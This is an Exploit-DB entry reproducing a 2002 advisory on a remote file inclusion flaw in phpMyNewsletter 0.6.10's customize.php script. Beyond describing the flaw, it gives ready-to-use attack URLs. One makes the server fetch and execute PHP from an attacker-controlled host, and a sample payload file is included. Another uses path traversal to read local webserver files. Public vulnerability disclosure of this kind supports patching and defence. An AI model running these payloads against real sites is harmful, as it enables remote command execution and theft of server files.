phpMyNewsletter 0.6.10 - Remote File Inclusion

EDB-ID:

21905


Author:

frog

Type:

webapps


Platform:

PHP

Date:

2002-10-03


source: https://www.securityfocus.com/bid/5886/info

A vulnerability has been discovered in phpMyNewsLetter.

Reportedly, it is possible to pass an attacker-specified file include location to a CGI paramter of the 'customize.php' script. 

This may allow an attacker to execute arbitrary commands with the privileges of the webserver.

Additionally, an attacker may exploit this problem to view local webserver readable files.

http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
With in http://[attacker]/code.txt :
<? echo $text; ?>

or
http://[target]/include/customize.php?l=../path/file/to/view